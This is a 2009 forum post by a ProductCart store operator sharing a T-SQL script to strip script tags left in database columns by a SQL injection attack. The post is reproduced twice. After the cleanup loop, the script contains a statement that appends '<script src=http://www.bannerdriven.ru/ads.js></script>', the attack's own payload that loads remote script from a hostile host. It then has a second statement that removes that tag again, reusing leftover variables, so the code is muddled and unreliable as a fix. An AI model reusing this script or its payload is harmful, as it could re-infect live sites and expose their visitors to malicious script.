SQL injection victim?

Message Topic Search Topic Options Post Reply Create New Topic Printable Version Translate Topic

   I have written a little SQL Query to clean up our database after an attack. I cannot guarentee it will work for anyone else, but I have run it on 2 separate ProductCart stores that I work with and it worked just fine without losing any data. You will just need to change the <script src=http://www.bannerdriven.ru/ads.js></script>
 to the link that has been injected into your database. 

Here it is:

DECLARE @T varchar(255), @C varchar(255);
DECLARE Table_Cursor CURSOR FOR
SELECT a.name, b.name
FROM sysobjects a, syscolumns b
WHERE a.id = b.id AND a.xtype = 'u' AND
(b.xtype = 99 OR
b.xtype = 35 OR
b.xtype = 231 OR
b.xtype = 167);
OPEN Table_Cursor;
FETCH NEXT FROM Table_Cursor INTO @T, @C;
WHILE (@@FETCH_STATUS = 0) BEGIN
EXEC(
'update ['+@T+'] set ['+@C+'] = left(
convert(varchar(8000), ['+@C+']),
len(convert(varchar(8000), ['+@C+'])) - 6 -
patindex(''%tpircs<%'',
reverse(convert(varchar(8000), ['+@C+'])))
)
where ['+@C+'] like ''%<script%</script>'''
);
FETCH NEXT FROM Table_Cursor INTO @T, @C;
END;
CLOSE Table_Cursor;
DEALLOCATE Table_Cursor;

EXEC(
'update [' + @T + '] set [' + @C + '] =
rtrim(convert(varchar,[' + @C + ']))+
''<script src=http://www.bannerdriven.ru/ads.js></script>'''
);

EXEC(
'update ['+@T+'] set ['+@C+'] = left(
convert(varchar(8000), ['+@C+']),
len(convert(varchar(8000), ['+@C+'])) - 6 -
patindex(''%tpircs<%'',
reverse(convert(varchar(8000), ['+@C+'])))
)
where ['+@C+'] like ''<script src=http://www.bannerdriven.ru/ads.js></script>'''
);

Author	Message Topic Search Topic Options Post Reply Create New Topic Printable Version Translate Topic
stsomeware Members Profile Send Private Message Find Members Posts Add to Buddy List Newbie Joined: 15-April-2009 Location: Orlando, Florid Status: Offline Points: 2	Post Options Post Reply Quote stsomeware Report Post Thanks(0) Quote Reply Posted: 06-October-2009 at 3:25pm
	I have written a little SQL Query to clean up our database after an attack. I cannot guarentee it will work for anyone else, but I have run it on 2 separate ProductCart stores that I work with and it worked just fine without losing any data. You will just need to change the <script src=http://www.bannerdriven.ru/ads.js></script> to the link that has been injected into your database. Here it is: DECLARE @T varchar(255), @C varchar(255); DECLARE Table_Cursor CURSOR FOR SELECT a.name, b.name FROM sysobjects a, syscolumns b WHERE a.id = b.id AND a.xtype = 'u' AND (b.xtype = 99 OR b.xtype = 35 OR b.xtype = 231 OR b.xtype = 167); OPEN Table_Cursor; FETCH NEXT FROM Table_Cursor INTO @T, @C; WHILE (@@FETCH_STATUS = 0) BEGIN EXEC( 'update ['+@T+'] set ['+@C+'] = left( convert(varchar(8000), ['+@C+']), len(convert(varchar(8000), ['+@C+'])) - 6 - patindex(''%tpircs<%'', reverse(convert(varchar(8000), ['+@C+']))) ) where ['+@C+'] like ''%<script%</script>''' ); FETCH NEXT FROM Table_Cursor INTO @T, @C; END; CLOSE Table_Cursor; DEALLOCATE Table_Cursor; EXEC( 'update [' + @T + '] set [' + @C + '] = rtrim(convert(varchar,[' + @C + ']))+ ''<script src=http://www.bannerdriven.ru/ads.js></script>''' ); EXEC( 'update ['+@T+'] set ['+@C+'] = left( convert(varchar(8000), ['+@C+']), len(convert(varchar(8000), ['+@C+'])) - 6 - patindex(''%tpircs<%'', reverse(convert(varchar(8000), ['+@C+']))) ) where ['+@C+'] like ''<script src=http://www.bannerdriven.ru/ads.js></script>''' );